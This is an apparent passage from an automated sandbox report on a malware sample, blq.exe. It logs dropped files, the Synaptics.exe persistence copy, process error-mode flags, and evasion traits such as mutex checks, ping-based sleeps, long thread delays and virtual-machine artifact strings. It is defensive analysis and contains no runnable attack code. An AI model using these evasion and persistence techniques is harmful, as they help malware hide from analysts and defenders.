                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10003E6B LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,4_2_10003E6B
                          Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\encvbk.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Found evasive API chain (may stop execution after checking mutex)
                          Source: C:\Users\user\Desktop\._cache_blq.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-373
                          Uses ping.exe to sleep
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 536Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 9462Jump to behavior
                          Source: C:\Windows\SysWOW64\encvbk.exeWindow / User API: threadDelayed 1471
                          Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 4023
                          Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 5938
                          Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-1591
                          Source: C:\Users\user\Desktop\._cache_blq.exeDropped PE file which has not been started: C:\Program Files (x86)\6795234.dllJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8104Thread sleep count: 86 > 30Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8104Thread sleep time: -5160000s >= -30000sJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6784Thread sleep time: -60000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7676Thread sleep count: 536 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7676Thread sleep time: -536000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7676Thread sleep count: 9462 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7676Thread sleep time: -9462000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\svchost.exe TID: 8008Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8008Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\SysWOW64\encvbk.exe TID: 8080Thread sleep count: 1471 > 30
                          Source: C:\Windows\SysWOW64\encvbk.exe TID: 8080Thread sleep time: -735500s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\splwow64.exeLast function: Thread delayed
                          Source: C:\Windows\splwow64.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_1000358C GetSystemInfo,wsprintfA,4_2_1000358C
                          Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: Amcache.hve.18.drBinary or memory string: VMware
                          Source: Amcache.hve.18.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.18.drBinary or memory string: VMware, Inc.
                          Source: encvbk.exe, 0000000A.00000002.4116954819.000000000303A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                          Source: Amcache.hve.18.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.18.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.18.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
